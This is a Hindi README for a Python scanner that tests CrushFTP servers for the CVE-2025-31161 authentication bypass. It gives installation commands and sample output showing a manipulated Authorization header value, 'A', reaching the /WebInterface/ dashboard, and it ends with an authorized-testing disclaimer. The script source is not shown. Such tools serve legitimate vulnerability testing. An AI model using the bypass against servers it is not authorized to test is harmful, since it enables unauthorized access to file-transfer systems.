
लक्ष्य को स्कैन करता है कि क्या यह CVE-2025-31161 के प्रति संवेदनशील है
CrushFTP सर्वरों में CVE-2025-31161 भेद्यता का पता लगाने और उसका परीक्षण करने के लिए एक Python टूल।
यह स्क्रिप्ट CrushFTP सर्वरों में प्रमाणीकरण बाईपास भेद्यता (CVE-2025-31161) का परीक्षण करती है, जो दूरस्थ हमलावरों को HTTP Authorization हेडर में हेरफेर करके वैध क्रेडेंशियल्स के बिना प्रमाणीकरण करने की अनुमति देती है।
python3 CVE-2025-31161.py
git clone https://github.com/yourusername/CVE-2025-31161.py
cd CVE-2025-31161.py
pip3 install -r requirements.txt
$ python3 CVE-2025-31161.py
लक्ष्य IP पता दर्ज करें: 192.168.1.100
लक्ष्य पोर्ट दर्ज करें [8080]: 8080
==================================================
📡 परीक्षण: /WebInterface/
🔑 पेलोड: 'A'
📊 स्थिति: 200
🎉 भेद्यता की पुष्टि हुई
💡 200 OK सामग्री के साथ: dashboard, main
✅ काम करने वाला पेलोड: 'A'
==================================================
🎯 लक्ष्य: 192.168.1.100:8080
🔴 भेद्यता स्थिति: भेद्य
💥 CVE-2025-31161 प्रमाणीकरण बाईपास की पुष्टि हुई
✅ काम करने वाले पेलोड:
==================================================
यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। इसका उपयोग केवल उन्हीं सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।